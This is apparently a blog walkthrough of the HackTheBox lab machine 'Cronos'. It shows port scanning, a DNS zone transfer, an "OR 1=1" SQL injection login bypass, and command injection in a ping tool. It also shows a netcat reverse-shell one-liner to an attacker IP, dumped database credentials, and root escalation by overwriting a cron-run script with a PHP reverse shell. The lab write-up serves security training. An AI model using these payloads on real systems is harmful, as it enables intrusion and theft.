hackthebox cronos walkthrough

Starting with masscan

# masscan -e tun0 -p1-65535 10.10.10.13 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-07-05 14:21:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 53/tcp on 10.10.10.13                                     
Discovered open port 22/tcp on 10.10.10.13                                     
Discovered open port 80/tcp on 10.10.10.13  

port 53 is open which is for DNS. Lets see if we can transfer zones

# dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.11.4-2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 155 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Fri Jul 05 10:34:31 EDT 2019
;; XFR size: 7 records (messages 1, bytes 203)

We discovered cronos.htb and admin.cronos.htb domains. Insert following in /etc/hosts file

10.10.10.13 cronos.htb. admin.cronos.htb www.cronos.htb

Browse both domains

hackthebox – cronos – laravel

…. and admin domain

hackthebox – cronos – admin

Use a few common techniques to enter/bypass login like admin/admin, guest/guest, etc and finally tried with SQLi which worked.

Use following in username and you can put anything as pass

admin' OR 1=1 #

… and we are in

hackthebox – cronos – net tool

Looks like someone made a net tool for traceroute and ping. We can try to inject command as following

8.8.8.8; ls

This worked and we were able to list files.

hackthebox – cronos – command injection

Lets get a shell for us.

Insert following instead of ls

8.8.8.8;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.44 4444 >/tmp/f

We get the shell

# nc -lvnp  4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.13] 44144
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Upgrade the shell

Lets get around

[email protected]:/var/www/admin$ cat config.php
<?php
   define('DB_SERVER', 'localhost');
   define('DB_USERNAME', 'admin');
   define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
   define('DB_DATABASE', 'admin');
   $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
[email protected]:/var/www/laravel$ cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:+fUFGL45d1YZYlSTc0Sm71wPzJejQN/K6s9bHHihdYE=
APP_DEBUG=true
APP_LOG_LEVEL=debug
APP_URL=http://localhost

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=homestead
DB_USERNAME=homestead
DB_PASSWORD=secret

[email protected]:/home$ ls
noulis

We see few password and the user is noulis

Playing around we see a cronjob which is run by root user every minute.

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

Looking at the permission, we can write the file directly

ls -lh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 3.4K Jul  6 07:31 /var/www/laravel/artisan

Replace artisan with /usr/share/webshells/php/php-reverse-shell.php in kali, listen for shell and we will get the shell soon.

# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.13] 33728
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 18:40:01 up  3:45,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/# whoami
whoami
root

Leave a Reply

Your email address will not be published. Required fields are marked *